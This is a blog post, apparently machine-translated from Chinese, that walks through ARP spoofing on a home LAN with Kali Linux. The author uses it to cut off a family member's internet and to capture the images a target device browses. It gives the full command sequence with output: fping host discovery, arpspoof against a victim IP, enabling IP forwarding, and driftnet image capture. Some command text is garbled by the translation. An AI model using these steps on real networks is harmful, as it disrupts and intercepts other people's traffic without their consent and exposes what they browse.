kali on the small operation of LAN

Recently, my father always watches TV dramas on the front page (no money, no advertisement, nothing happened during the epidemic), but he usually goes back to a little more at night, which is not good for his health. My mother said that my father went to bed too late and wanted him to go to bed earlier, but he didn't listen. I used kali to cut off the Internet. The following information is for learning only.

1. arp break the net.

1.1 tools required

  • VM virtual machine (network select bridge mode), kali operating system
  • fping, similar to the ping under win, can help us to check the surviving ip in the LAN.

1.2 specific operation

  1. Ifconfig = > used to view ip
root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.101  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::20c:29ff:fe69:929a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:69:92:9a  txqueuelen 1000  (Ethernet)
        RX packets 1635316  bytes 226317367 (215.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 141839  bytes 141216587 (134.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1996  bytes 222108 (216.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1996  bytes 222108 (216.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

If you have WLAN 0, you can use WLAN 0.
2. IP route show = > you can query our gateway

root@kali:~# ip route show
default via 192.168.1.1 dev eth0 proto dhcp metric 100 
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.101 metric 100 
  1. Look at the surviving ip of LAN. Who commands fping -asg 192.168.1.0/24
root@kali:~# fping -asg 192.168.1.0/24
192.168.1.1
192.168.1.101
192.168.1.107
192.168.1.103
192.168.1.102
192.168.1.109
192.168.1.104

There is still a pile of ip that I will not write. Basically, there is no surviving ip. Here, I'm 192.168.1.103.

  1. arp spoofing, the command is very simple, here I use my ip test
root@kali:~# arpspoof -i eth0 -t 192.168.1.103 192.168.1.1
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a

Say this command format:
This command means arp spoofing. All arp packets sent by others come to my network card. The first parameter is to monitor the local eth0 network card. The first IP is the victim IP and the second is the gateway IP. Now I can't refresh my headline today. But others can send you wechat and you can receive it.
After updating kali yesterday, it was found that there was no arpspoof command. You can install it yourself and read someone else's readme.md on github. There are detailed commands in it.
Use Ctrl+z to stop spoofing.
In fact, I've finished writing here. I think that since arpspoof is used, what I have to mention is drivernet.

2. View the pictures of LAN specific ip browsing

Take the last reply to drivernet, and use this to show the operation.
Enter drivetnet in the terminal to see if there is such a tool. If there is no or no command, go to github to find the installation tutorial. Here is the github address: Read readme.md

  1. The terminal inputs echo 1 > / proc / sys / net / IPv4 / ip ﹐ forward to forward ip, so as to ensure that the spoofed ip can access the Internet normally, that is to change 0 in the file to 1
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# 
  1. Start cheating (with my ip)
arpspoof -i eth0 -t 192.168.1.1 192.168.1.103

-i is to specify the network card, - t specifies the gateway first, and then the attack ip
The following is the beginning:

root@kali:~# arpspoof -i eth0 -t 192.168.1.103 192.168.1.1
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a

Run after:

driftnet -i eth0

Here I use today's headlines to search for Kobe's pictures. If there is no accident in drivernet, there will be the following information (I will upload the pictures directly):

Later pictures will be saved to home.
Record the current time:

In [1]: from datetime import datetime                                           

In [2]: print(datetime.now())                                                   
2020-02-16 14:47:59.696041

In [3]: 
Published 5 original articles, won praise 0, visited 327
Private letter follow

Tags: network github

Posted on Sun, 16 Feb 2020 02:35:44 -0500 by theqase